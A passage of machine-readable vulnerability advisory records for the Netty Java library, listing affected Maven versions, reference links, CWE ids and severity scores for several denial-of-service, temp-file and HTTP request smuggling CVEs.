"4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", "4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.6.Final", "4.1.7.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/02/GHSA-5mcr-gq6c-3hq2/GHSA-5mcr-gq6c-3hq2.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/02/GHSA-5mcr-gq6c-3hq2/GHSA-5mcr-gq6c-3hq2.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final", "3.10.3.Final", "3.10.4.Final", "3.10.5.Final", "3.10.6.Final", "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final", "3.9.8.Final", "3.9.9.Final", "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/02/GHSA-5mcr-gq6c-3hq2/GHSA-5mcr-gq6c-3hq2.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-5mcr-gq6c-3hq2" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21290" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/c735357bf29d07856ad171c6611a2e1a0e0000ec" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7bb3cdc192e9a6f863d3ea05422f09fa1ae2b88d4663e63696ee7ef5@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9924ef9357537722b28d04c98a189750b80694a19754e5057c34ca48@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra0fc2b4553dd7aaf75febb61052b7f1243ac3a180a71c01f29093013@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra503756ced78fdc2136bd33e87cb7553028645b261b1f5c6186a121e@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb06c1e766aa45ee422e8261a8249b561784186483e8f742ea627bda4@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb51d6202ff1a773f96eaa694b7da4ad3f44922c40b3d4e1a19c2f325@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb592033a2462548d061a83ac9449c5ff66098751748fcd1e2d008233@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc0087125cb15b4b78e44000f841cd37fefedfda942fd7ddf3ad1b528@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc488f80094872ad925f0c73d283d4c00d32def81977438e27a3dc2bb@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcd163e421273e8dca1c71ea298dce3dd11b41d51c3a812e0394e6a5d@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdba4f78ac55f803893a1a2265181595e79e3aa027e2e651dfba98c18@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/02/msg00016.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220210-0011" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4885" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0053443ce19ff125981559f8c51cf66e3ab4350f47812b8cf0733a05@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r02e467123d45006a1dda20a38349e9c74c3a4b53e2e07be0939ecb3f@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0857b613604c696bf9743f0af047360baaded48b1c75cf6945a083c5@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r10308b625e49d4e9491d7e079606ca0df2f0a4d828f1ad1da64ba47b@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1908a34b9cc7120e5c19968a116ddbcffea5e9deb76c2be4fa461904@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2748097ea4b774292539cf3de6e3b267fc7a88d6c8ec40f4e2e87bd4@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2936730ef0a06e724b96539bc7eacfcd3628987c16b1b99c790e7b87@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2fda4dab73097051977f2ab818f75e04fbcb15bb1003c8530eac1059@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r326ec431f06eab7cb7113a7a338e59731b8d556d05258457f12bac1b@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4efed2c501681cb2e8d629da16e48d9eac429624fd4c9a8c6b8e7020@%3Cdev.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r584cf871f188c406d8bd447ff4e2fd9817fca862436c064d0951a071@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r59bac5c09f7a4179b9e2460e8f41c278aaf3b9a21cc23678eb893e41@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5bf303d7c04da78f276765da08559fdc62420f1df539b277ca31f63b@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5c701840aa2845191721e39821445e1e8c59711e71942b7796a6ec29@%3Cusers.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e4a540089760c8ecc2c411309d74264f1dad634ad93ad583ca16214@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e66e286afb5506cdfe9bbf68a323e8d09614f6d1ddc806ed0224700@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r71dbb66747ff537640bb91eb0b2b24edef21ac07728097016f58b01f@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r743149dcc8db1de473e6bff0b3ddf10140a7357bc2add75f7d1fbb12@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r790c2926efcd062067eb18fde2486527596d7275381cfaff2f7b3890@%3Cissues.bookkeeper.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-378", "CWE-379", "CWE-668" ], "github_reviewed": true, "github_reviewed_at": "2021-02-08T20:07:45Z", "nvd_published_at": "2021-02-08T20:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7vpq-g998-qpv7", "published": "2022-05-13T01:54:02Z", "modified": "2024-12-08T05:28:34.511125Z", "aliases": [ "CVE-2014-0193" ], "summary": "Netty denial of service vulnerability", "details": "`WebSocket08FrameDecoder` in Netty 3.6.x before 3.6.9, 3.7.x before 3.7.1, 3.8.x before 3.8.2, 3.9.x before 3.9.1, and 4.0.x before 4.0.19 allows remote attackers to cause a denial of service (memory consumption) via a `TextWebSocketFrame` followed by a long stream of `ContinuationWebSocketFrames`.", "affected": [ { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.6.0.Beta1" }, { "fixed": "3.6.9.Final" } ] } ], "versions": [ "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-7vpq-g998-qpv7/GHSA-7vpq-g998-qpv7.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.7.0.Final" }, { "fixed": "3.7.1.Final" } ] } ], "versions": [ "3.7.0.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-7vpq-g998-qpv7/GHSA-7vpq-g998-qpv7.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.8.0.Final" }, { "fixed": "3.8.2.Final" } ] } ], "versions": [ "3.8.0.Final", "3.8.1.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-7vpq-g998-qpv7/GHSA-7vpq-g998-qpv7.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.9.0.Final" }, { "fixed": "3.9.1.Final" } ] } ], "versions": [ "3.9.0.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-7vpq-g998-qpv7/GHSA-7vpq-g998-qpv7.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0.Alpha1" }, { "fixed": "4.0.19.Final" } ] } ], "versions": [ "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-7vpq-g998-qpv7/GHSA-7vpq-g998-qpv7.json" } }, { "package": { "name": "io.netty:netty-all", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-all" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0.Alpha1" }, { "fixed": "4.0.19.Final" } ] } ], "versions": [ "4.0.0.Beta1", "4.0.0.Beta2", "4.0.0.Beta3", "4.0.0.CR1", "4.0.0.CR2", "4.0.0.CR3", "4.0.0.CR4", "4.0.0.CR5", "4.0.0.CR6", "4.0.0.CR7", "4.0.0.CR8", "4.0.0.CR9", "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.2.Final", "4.0.3.Final", "4.0.4.Final", "4.0.5.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-7vpq-g998-qpv7/GHSA-7vpq-g998-qpv7.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-0193" }, { "type": "WEB", "url": "https://github.com/netty/netty/issues/2441" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/8599ab5bdb761bb99d41a975d689f74c12e4892b" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html" }, { "type": "WEB", "url": "https://web.archive.org/web/20140509033427/http://www.securityfocus.com/bid/67182" }, { "type": "WEB", "url": "https://web.archive.org/web/20140509044857/http://secunia.com/advisories/58280" }, { "type": "WEB", "url": "https://web.archive.org/web/20161119201425/http://secunia.com/advisories/59290" }, { "type": "WEB", "url": "http://netty.io/news/2014/04/30/release-day.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1019.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1020.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1021.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1351.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0675.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0720.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0765.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2023-08-07T20:25:36Z", "nvd_published_at": "2014-05-06T14:55:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-9vjp-v76f-g363", "published": "2021-09-09T17:11:31Z", "modified": "2024-03-11T05:32:25.452063Z", "aliases": [ "CVE-2021-37137" ], "related": [ "CGA-rmxq-xv79-3xfc", "CVE-2021-37137" ], "summary": " SnappyFrameDecoder doesn't restrict chunk length any may buffer skippable chunks in an unnecessary way", "details": "### Impact\nThe Snappy frame decoder function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well.\n\nThis vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk.\n\n### Impact\n\nAll users of SnappyFrameDecoder are affected and so the application may be in risk for a DoS attach due excessive memory usage.\n\n### References\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L79\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L171\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L185", "affected": [ { "package": { "name": "io.netty:netty-codec", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-codec" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.1.68.Final" } ] } ], "versions": [ "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", "4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.59.Final", "4.1.6.Final", "4.1.60.Final", "4.1.61.Final", "4.1.62.Final", "4.1.63.Final", "4.1.64.Final", "4.1.65.Final", "4.1.66.Final", "4.1.67.Final", "4.1.7.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-9vjp-v76f-g363/GHSA-9vjp-v76f-g363.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-9vjp-v76f-g363/GHSA-9vjp-v76f-g363.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final", "3.10.3.Final", "3.10.4.Final", "3.10.5.Final", "3.10.6.Final", "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final", "3.9.8.Final", "3.9.9.Final", "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-9vjp-v76f-g363/GHSA-9vjp-v76f-g363.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-9vjp-v76f-g363" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37137" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/6da4956b31023ae967451e1d94ff51a746a9194f" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5316" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220210-0012" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfb2bf8597e53364ccab212fbcbb2a4e9f0a9e1429b1dc08023c6868e@%3Cdev.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd262f59b1586a108e320e5c966feeafbb1b8cdc96965debc7cc10b16@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75490c61c2cb7b6ae2c81238fd52ae13636c60435abcd732d41531a0@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e05eba32476c580412f9fbdfc9b8782d5b40558018ac4ac07192a04@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5406eaf3b07577d233b9f07cfc8f26e28369e6bab5edfcab41f28abb@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r06a145c9bd41a7344da242cef07977b24abe3349161ede948e30913d@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L79" }, { "type": "WEB", "url": "https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L185" }, { "type": "WEB", "url": "https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L171" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-09-09T14:44:10Z", "nvd_published_at": "2021-10-19T15:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cqqj-4p63-rrmm", "published": "2020-02-21T18:55:24Z", "modified": "2025-07-02T16:20:12.563640Z", "aliases": [ "CVE-2019-20444" ], "related": [ "CGA-gg6m-vh7x-6jr4" ], "summary": "HTTP Request Smuggling in Netty", "details": "HttpObjectDecoder.java in Netty before 4.1.44 allows an HTTP header that lacks a colon, which might be interpreted as a separate header with an incorrect syntax, or might be interpreted as an \"invalid fold.\"", "affected": [ { "package": { "name": "io.netty:netty-codec-http", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-codec-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.1.44" } ] } ], "versions": [ "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8", "4.0.0.Beta1", "4.0.0.Beta2", "4.0.0.Beta3", "4.0.0.CR1", "4.0.0.CR2", "4.0.0.CR3", "4.0.0.CR4", "4.0.0.CR5", "4.0.0.CR6", "4.0.0.CR7", "4.0.0.CR8", "4.0.0.CR9", "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", 